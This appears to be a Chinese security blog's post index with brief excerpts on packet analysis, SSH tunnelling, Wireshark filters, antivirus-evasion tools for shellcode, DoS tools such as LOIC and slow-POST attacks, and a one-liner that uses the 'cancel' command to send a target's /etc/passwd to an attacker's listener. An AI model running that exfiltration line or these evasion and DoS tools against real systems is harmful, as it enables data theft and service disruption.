摘要: PCAP 报文就是抓取实际在网络中传输的图片,视频等数据,然后以PCAP 格式存储形成的文件。工作中对离线的数据包进行回溯分析,有时会遇到将 PCAP 中的码流还原成相应的图片、视频、邮件等原有格式的需求。从... 阅读全文
posted @ 2019-03-24 19:31 micr067 阅读(553) 评论(0) 推荐(0) 编辑
摘要: 1.安装CA证书 生成一个证书文件 http://127.0.0.1/certsrv/ 申请证书 选择高级证书申请 将之前生成的base64证书文件内容贴进来 ok,完成 挂起的申请—所有任务—颁发 在颁发的证书中可以看到我们已经申请好 的证书。 访问http://127.0.0.1/certsrv 阅读全文
posted @ 2019-03-23 22:40 micr067 阅读(160) 评论(0) 推荐(0) 编辑
摘要: ssh本地端口转发 (1)SSH 支持双向通信隧道 将其他 TCP 端口的通信通过 SSH 链接来转发 用 SSH 作为传输协议,对流量自动加解密 突破防火墙访问规则的限制,可用于FQ (2)SSH 本地端口转发 使效果类似于 rinetd 将一本地端口与远程服务器建立隧道 (3)建立双向安全隧道 阅读全文
posted @ 2019-03-23 22:34 micr067 阅读(111) 评论(0) 推荐(0) 编辑
摘要: 1.筛选器 ip.addr==192.168.88.160 and tcp.port==80 !tcp 查看分tcp的协议 frame.len<=150 查看长度小于等于150字节的数据包 捕获tcp中带有psh和ack标志偏移位为13的的数据包 tcp[13]==0x18 将常用筛选条件到添加删选 阅读全文
posted @ 2019-03-15 18:32 micr067 阅读(180) 评论(0) 推荐(0) 编辑
摘要: 今天整理以前的笔记,把这部分工具整理了一下,虽然没有白利用稳,但这些工具也能在一定程度起到一定的免杀作用。 DKMC 项目地址: https://github.com/Mr-Un1k0d3r/DKMC 可以创建一个 outputs 文件夹 存放 shellcode 启动 python dkmc.py 阅读全文
posted @ 2019-03-15 18:10 micr067 阅读(523) 评论(0) 推荐(0) 编辑
摘要: nc -lvvp 7080 开启侦听 cancel -u “$(cat /etc/passwd)” -h 192.168.0.101:3321 在靶机上执行命令 攻击机成功接收到靶机发送信息。 阅读全文
posted @ 2019-03-14 20:08 micr067 阅读(143) 评论(0) 推荐(0) 编辑
摘要: ssh本地端口转发 (1)SSH 支持双向通信隧道 将其他 TCP 端口的通信通过 SSH 链接来转发 用 SSH 作为传输协议,对流量自动加解密 突破防火墙访问规则的限制,可用于FQ (2)SSH 本地端口转发 使效果类似于 rinetd 将一本地端口与远程服务器建立隧道 (3)建立双向安全隧道 阅读全文
posted @ 2019-03-14 18:06 micr067 阅读(129) 评论(0) 推荐(0) 编辑
摘要: 1.安装CA证书 生成一个证书文件 http://127.0.0.1/certsrv/ 申请证书 选择高级证书申请 将之前生成的base64证书文件内容贴进来 ok,完成 挂起的申请—所有任务—颁发 在颁发的证书中可以看到我们已经申请好 的证书。 访问http://127.0.0.1/certsrv 阅读全文
posted @ 2019-03-14 08:03 micr067 阅读(139) 评论(0) 推荐(0) 编辑
摘要: 1. 简介匿名者发布的 DoS 工具LOICHOICDDoSer招募志愿者发放以上工具以上 DoS 工具不隐藏真实 IP 地址免费DDOS攻击测试工具大合集 FreeBuf 下载链接2. LOIChttps:... 阅读全文
posted @ 2019-03-14 07:26 micr067 阅读(452) 评论(0) 推荐(0) 编辑
摘要: 拒绝服务分类攻击带宽攻击并发消耗cpu内存攻击代码漏洞1. rudy(r-y dead yet)1. 简介慢速应用层HTTP POST攻击,与slowhttptest原理相同每次只传输一个字节的数据美剧黑客军... 阅读全文
posted @ 2019-03-14 07:24 micr067 阅读(248) 评论(0) 推荐(0) 编辑